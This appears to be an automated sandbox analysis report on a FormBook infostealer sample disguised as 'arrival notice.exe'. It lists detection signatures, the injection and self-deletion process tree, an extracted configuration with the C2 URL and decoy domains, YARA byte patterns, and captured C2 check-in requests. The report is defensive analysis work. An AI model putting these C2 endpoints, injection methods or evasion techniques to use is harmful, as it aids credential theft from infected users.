Loading ...

Play interactive tourEdit tour

Windows Analysis Report arrival notice.exe

Overview

General Information

Sample Name:arrival notice.exe
Analysis ID:483574
MD5:692c22c9579ce47100a87e90f911b202
SHA1:29189325967d4716883edabb4c03a5a30d836896
SHA256:3f383c683795d277510e0fb4c806ae17bfb33dd6ff875b66c159068e58c28818
Tags:exexloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • arrival notice.exe (PID: 6224 cmdline: 'C:\Users\user\Desktop\arrival notice.exe' MD5: 692C22C9579CE47100A87E90F911B202)
    • arrival notice.exe (PID: 6400 cmdline: C:\Users\user\Desktop\arrival notice.exe MD5: 692C22C9579CE47100A87E90F911B202)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 6788 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 6256 cmdline: /c del 'C:\Users\user\Desktop\arrival notice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nordicbatterybelt.net/n58i/"], "decoy": ["southerncircumstance.com", "mcsasco.com", "ifbrick.com", "societe-anonyme.net", "bantank.xyz", "dogecoin.beauty", "aboutacoffee.com", "babalandlordrealestate.com", "tintgta.com", "integrity.directory", "parwnr.icu", "poltishof.online", "stayandstyle.com", "ickjeame.xyz", "currentmotors.ca", "pond.fund", "petrosterzis.com", "deadbydaylightpoints.com", "hotel-balzac.paris", "focusmaintainance.com", "odeonmarket.com", "voeran.net", "lookailpop.xyz", "sashaignatenko.com", "royalgreenvillage.com", "airbhouse.com", "zl-dz.com", "fuwuxz.com", "wugupihuhepop.xyz", "zmdhysm.com", "luchin.site", "rnchaincvkbip.xyz", "fffddfrfqffrtgthhhbhffgfr.com", "goabbasoon.info", "booyahbucks.com", "ilovecoventry.com", "components-electronics.com", "advindustry.com", "browandline.com", "hotnspicy.site", "marlonj26.com", "holidays24.net", "starworks.online", "mbchaindogbbc.xyz", "3wouqg.com", "evnfreesx.com", "baureihe51.com", "hycelassetmanagement.space", "photostickomni-trendyfinds.com", "singisa4letterword.com", "thklw.online", "menramen.com", "highspeedinternetinc.com", "beerenhunger.info", "hisensor.world", "lassurancevalence.com", "clementchanlab.com", "customia.xyz", "alysvera-centroestetico.com", "cx-xiezuo.com", "index-mp3.com", "mybenefits51.com", "vyhozoi.site", "lingerista.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x80ba8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x80f42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa89c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8cc55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xb4a75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x8c741:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xb4561:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x8cd57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xb4b77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x8cecf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xb4cef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x8195a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xa977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x8b9bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb37dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x826d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xaa4f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x92147:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xb9f67:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x931ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.arrival notice.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.arrival notice.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.arrival notice.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        3.2.arrival notice.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.arrival notice.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nordicbatterybelt.net/n58i/"], "decoy": ["southerncircumstance.com", "mcsasco.com", "ifbrick.com", "societe-anonyme.net", "bantank.xyz", "dogecoin.beauty", "aboutacoffee.com", "babalandlordrealestate.com", "tintgta.com", "integrity.directory", "parwnr.icu", "poltishof.online", "stayandstyle.com", "ickjeame.xyz", "currentmotors.ca", "pond.fund", "petrosterzis.com", "deadbydaylightpoints.com", "hotel-balzac.paris", "focusmaintainance.com", "odeonmarket.com", "voeran.net", "lookailpop.xyz", "sashaignatenko.com", "royalgreenvillage.com", "airbhouse.com", "zl-dz.com", "fuwuxz.com", "wugupihuhepop.xyz", "zmdhysm.com", "luchin.site", "rnchaincvkbip.xyz", "fffddfrfqffrtgthhhbhffgfr.com", "goabbasoon.info", "booyahbucks.com", "ilovecoventry.com", "components-electronics.com", "advindustry.com", "browandline.com", "hotnspicy.site", "marlonj26.com", "holidays24.net", "starworks.online", "mbchaindogbbc.xyz", "3wouqg.com", "evnfreesx.com", "baureihe51.com", "hycelassetmanagement.space", "photostickomni-trendyfinds.com", "singisa4letterword.com", "thklw.online", "menramen.com", "highspeedinternetinc.com", "beerenhunger.info", "hisensor.world", "lassurancevalence.com", "clementchanlab.com", "customia.xyz", "alysvera-centroestetico.com", "cx-xiezuo.com", "index-mp3.com", "mybenefits51.com", "vyhozoi.site", "lingerista.net"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 3.2.arrival notice.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: arrival notice.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: arrival notice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: colorcpl.pdbGCTL source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe, 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 4x nop then pop edi3_2_0041625A
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 4x nop then pop edi3_2_0040C3D2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi10_2_0097625A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi10_2_0096C3D2

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49819 -> 217.160.0.150:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49819 -> 217.160.0.150:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49819 -> 217.160.0.150:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.beerenhunger.info
          Source: C:\Windows\explorer.exeDomain query: www.ilovecoventry.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mybenefits51.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.singisa4letterword.com
          Source: C:\Windows\explorer.exeDomain query: www.petrosterzis.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.150 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.nordicbatterybelt.net/n58i/
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1Host: www.ilovecoventry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1Host: www.ilovecoventry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n58i/?vbOlS=UboLn&jrU4NBtp=T43/QHtHCDAxgurMA2nnAzm7cVxOj31InS0qjlwJ5pTUrF8t/fgh9WgQ4TT9zfTSmLODbJhfnA== HTTP/1.1Host: www.beerenhunger.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n58i/?jrU4NBtp=kluGknW3JYulth+FZOKNGJWFLrjrg7vx1WPWThgYE53lU0Uyu20JwynqYY4FZ9Ej1j1u7QgdhQ==&vbOlS=UboLn HTTP/1.1Host: www.singisa4letterword.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Wed, 15 Sep 2021 07:24:30 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.403044652.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: arrival notice.exe, 00000001.00000002.380922873.0000000000DD7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.come.com
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: arrival notice.exe, 00000001.00000003.354453209.0000000000DDC000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comm
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: colorcpl.exe, 0000000A.00000002.618757124.00000000051D2000.00000004.00020000.sdmpString found in binary or memory: https://www.aboutacoffee.com/n58i/?jrU4NBtp=iErxmr1uZwtSCCPIrNfUjuIgI02QQ4hyHDBIFJ5frhw4ANpZ5EdrzBW9
          Source: unknownDNS traffic detected: queries for: www.petrosterzis.com
          Source: global trafficHTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1Host: www.ilovecoventry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1Host: www.ilovecoventry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n58i/?vbOlS=UboLn&jrU4NBtp=T43/QHtHCDAxgurMA2nnAzm7cVxOj31InS0qjlwJ5pTUrF8t/fgh9WgQ4TT9zfTSmLODbJhfnA== HTTP/1.1Host: www.beerenhunger.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n58i/?jrU4NBtp=kluGknW3JYulth+FZOKNGJWFLrjrg7vx1WPWThgYE53lU0Uyu20JwynqYY4FZ9Ej1j1u7QgdhQ==&vbOlS=UboLn HTTP/1.1Host: www.singisa4letterword.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
